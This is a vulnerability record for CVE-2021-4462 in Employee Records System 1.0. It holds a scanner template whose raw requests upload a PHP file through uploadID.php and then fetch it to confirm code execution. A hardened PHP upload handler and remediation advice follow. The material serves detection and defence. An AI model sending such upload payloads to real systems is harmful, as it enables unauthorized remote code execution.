Vulnerability description
Employee Records System version 1.0 contains an unrestricted file upload vulnerability in uploadID.php that allows remote unauthenticated attackers to upload arbitrary PHP files and achieve remote code execution.
id: CVE-2021-4462

info:
  name: Employee Records System 1.0 - Unauthenticated File Upload RCE
  author: josephttd
  severity: critical
  description: |
    Employee Records System version 1.0 contains an unrestricted file upload vulnerability in uploadID.php that allows remote unauthenticated attackers to upload arbitrary PHP files and achieve remote code execution.
  reference:
    - https://www.exploit-db.com/exploits/49596
    - https://www.sourcecodester.com/php/11393/employee-records-system.html
  classification:
    cvss-score: 9.8
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cwe-id: CWE-434
    epss-score: 0.12728
    epss-percentile: 0.93737
  metadata:
    verified: true
    max-request: 2
  tags: cve,cve2021,employee-records,fileupload,rce,intrusive,vkev

variables:
  string: "CVE-2021-4462"
  filename: "{{to_lower(rand_base(5))}}.php"

http:
  - raw:
      - |
        POST /dashboard/uploadID.php HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW

        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="employee_ID"; filename="{{filename}}"
        Content-Type: image/png

        <?php echo md5("{{string}}");unlink(__FILE__); ?>
        ------WebKitFormBoundary7MA4YWxkTrZu0gW--

      - |
        GET /uploads/employees_ids/{{upload_filename}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: upload_filename
        part: body
        internal: true
        group: 1
        regex:
          - '"upload_filename":"([^"]+)"'

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(body_2, "{{md5(string)}}")'
        condition: and
# digest: 4a0a0047304502201dec2684b6fe604883a0fa98e17c039532589a62a2f66706babede192528a465022100ef46641a6fa1eacc08376874175431464b87fb71fce5a95a386dd6027955391d:922c64590222798bb761d5b6d8e72950
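The root cause the template checks for is CWE-434: the handler trusts the client-supplied filename and Content-Type, stores the file under a web-served directory, and requires no login. The following is an added example of a hardened replacement for that kind of handler; it is not the project's own uploadID.php. Only the form field name employee_ID, the JSON key upload_filename and the directory uploads/employees_ids/ are taken from the template above; the session-based login check, the size limit and the PNG/JPEG allowlist are assumptions.

```php
<?php
// Added example (not code from Employee Records System): a hardened ID-image upload handler.
declare(strict_types=1);

const UPLOAD_DIR = __DIR__ . '/uploads/employees_ids/';
const MAX_BYTES  = 2 * 1024 * 1024; // assumed limit: 2 MiB

// Allowed image types, keyed by the MIME type sniffed from the file *content*.
// The client's Content-Type header and filename are attacker-controlled and never consulted.
const ALLOWED_TYPES = [
    'image/png'  => 'png',
    'image/jpeg' => 'jpg',
];

/**
 * Validate one entry of $_FILES and return the extension to store it with.
 * Throws RuntimeException on any failure.
 */
function validate_id_image(array $file): string
{
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('File too large');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Not an uploaded file');
    }
    // First check: sniff the real type from the bytes on disk.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if ($mime === false || !isset(ALLOWED_TYPES[$mime])) {
        throw new RuntimeException('Unsupported file type');
    }
    // Second check: the file must actually decode as an image.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('Not a valid image');
    }
    return ALLOWED_TYPES[$mime];
}

/**
 * Store a validated upload under a random server-chosen name and return that name.
 */
function store_id_image(array $file): string
{
    $ext  = validate_id_image($file);
    // Never reuse the client-supplied name: random name, extension fixed by the sniffed type.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = UPLOAD_DIR . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Could not store file');
    }
    chmod($dest, 0644); // not executable, owner-writable only
    return $name;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    session_start();
    header('Content-Type: application/json');
    // Assumption: a logged-in user is identified by $_SESSION['user_id'].
    // Requiring it closes the "unauthenticated" half of the original finding.
    if (empty($_SESSION['user_id'])) {
        http_response_code(401);
        echo json_encode(['error' => 'login required']);
        exit;
    }
    try {
        echo json_encode(['upload_filename' => store_id_image($_FILES['employee_ID'] ?? [])]);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo json_encode(['error' => $e->getMessage()]);
    }
}
```

Against the template's two requests, this handler rejects the first one twice over (no session, and a PHP payload is not a PNG by content), and even a file that passed as an image would be stored with a .png or .jpg extension under a random name, so the second request could never reach a script. As defence in depth, also disable script execution in uploads/employees_ids/ (for Apache, a `php_flag engine off` or `RemoveHandler` directive in that directory) or keep uploads outside the web root and serve them through a read-only handler.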